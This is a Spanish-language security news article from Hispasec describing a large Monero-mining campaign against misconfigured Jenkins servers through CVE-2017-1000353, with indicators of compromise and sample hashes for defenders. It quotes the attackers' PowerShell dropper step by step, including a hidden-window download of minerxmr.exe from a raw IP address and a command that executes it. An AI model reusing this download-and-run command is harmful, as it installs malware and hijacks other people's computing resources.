Una al Día

Boletín de noticias de Seguridad Informática ofrecido por Hispasec

Usted está aquí: Inicio / Malware / Más de 2,7 millones de euros en criptomonedas desde instalaciones de Jenkins comprometidas

Más de 2,7 millones de euros en criptomonedas desde instalaciones de Jenkins comprometidas

Por Deja un comentario

El equipo de CheckPoint ha descubierto la que puede ser la mayor operación de minado de criptomonedas: el equivalente a más de 3 millones de dólares de la criptomoneda Monero (XMR) han sido generados utilizando la capacidad de procesado de miles de servidores Jenkins mal configurados.

Jenkins es un popular software de integración continua (CI) de código abierto escrito en Java. Actualmente es mantenido por la comunidad y por el proveedor de servicios de CD/CI CloudBees.

El grupo criminal, de origen chino, se ha valido de instalaciones mal configuradas o inseguras para instalar el troyano encargado de minar la criptomoneda.

Para inyectar el código malicioso, los atacantes aprovechan la vulnerabilidad etiquetada con CVE-2017-1000353 que permitirá saltar restricciones de seguridad y ejecutar comandos en la interfaz CLI de Jenkins:

  1. Primero se comprueban las capacidades y permisos del cliente víctima.
  2. En función de la respuesta anterior, se inyecta el payload que contiene entre otras cosas el código encargado del minado de la criptomoneda.

Inyección del código malicioso. Fuente: https://research.checkpoint.com


Esta segunda fase del ataque es la más interesante:

  1. Primero se ejecuta una instancia de PowerShell en segundo plano: powershell.exe -WindowStyle Hidden: 
  2. Se declara un objeto de tipo web-client: $P = nEW-oBJECT sYSTEM.nET.wEBcLIENT
  3. El dropper descarga el software encargado del minado: $P.DownloadFile(‘http://222.184.79.11:5329/minerxmr.exe’, ‘C:\\Windows\\minerxmr.exe’)
  4. Para posteriormente ejecutarlo con el comando: START C:\\Windows\\minerxmr.exe


Los atacantes están bien organizados y distribuyen las operaciones de minado entre diferentes ‘pools’. Sin embargo, todas las ganancias están centralizadas en una única cartera, que al momento de escribir la noticia, supera ya los 10829 XMR. El equivalente a unos 2,75 millones de euros al cambio.

Algunos IOCs:

Dominios e IP:

  • 222[.]184[.]79[.]11
  • 183[.]136[.]202[.]244
  • btc[.]poolbt[.]com
  • shell[.]poolbt[.]com
  • xmr[.]btgirl[.]com[.]cn
  • btc[.]btgirl[.]com[.]cn


Muestras:

SHA256: 0bb4503cc52530ddadb102fa4010fb4d89af88aca846d4b16f601d0702134246 

SHA256: 06f8eda46fd6bdc11b8ec4d18a0f0afbf3d47f82cea8363d342975896582a715

SHA256: f0430130a2f3549b1aeff0a9fb2246f68f585a7c1d312c7be385a1cf5f37e70d

SHA256: c87d294cb0384cb56f4829d58cdd3f53572d3f95c2133a9b1da5f5bc1710f22f

SHA256: f750d6da918a5f2f2c442a339821ffebcad4b61e4ca1684bac0e7df98416a794

SHA256: 3002551eebaf486d77a2b81d87db553ad8632bb132553e306395c5da589171fe

SHA256: 213a23219ff89c412f92aa1fdf7152178a81514014ee1cc4ffee97e725ee63a3

SHA256: ff8c97cd55523cbdceef80407269d35bbf78abcbf807426c12d9debe1ce498d9

SHA256: 2beaa23907c40cfcb705844f4f515ff81a788abe1aed2c8d23626d9d735968ae

SHA256: b22fa98c3ee99222c4e827a9745f206ccf7cd40530459a92f183e148b0df5ce9

Francisco Salido
fsalido@hispasec.com

Más información:

Jenkins Miner: One of the Biggest Mining Operations Ever Discovered
https://research.checkpoint.com/jenkins-miner-one-biggest-mining-operations-ever-discovered/






Acerca de Francisco Salido

Francisco Salido Ha escrito 140 publicaciones.

Interacciones con los lectores

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Este sitio usa Akismet para reducir el spam. Aprende cómo se procesan los datos de tus comentarios.